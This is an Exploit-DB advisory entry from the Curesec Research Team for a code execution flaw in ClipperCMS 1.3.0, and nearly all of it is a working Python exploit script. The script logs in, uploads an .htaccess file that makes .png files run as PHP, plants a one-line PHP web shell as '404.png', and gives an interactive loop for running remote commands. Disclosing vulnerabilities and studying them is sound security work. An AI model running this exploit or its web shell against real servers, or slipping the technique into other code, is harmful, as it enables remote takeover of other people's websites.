ClipperCMS 1.3.0 - Code Execution Vulnerability

2015-11-16T00:00:00
ID EDB-ID:38730
Type exploitdb
Reporter Curesec Research Team
Modified 2015-11-16T00:00:00

Description

ClipperCMS 1.3.0 - Code Execution Vulnerability. Remote exploit for php platform

                                        
                                            #!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"

def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})

def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)

def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})

def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)

fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)

uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")

uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")

if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")

runShell(url + "404.png?x=")


#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html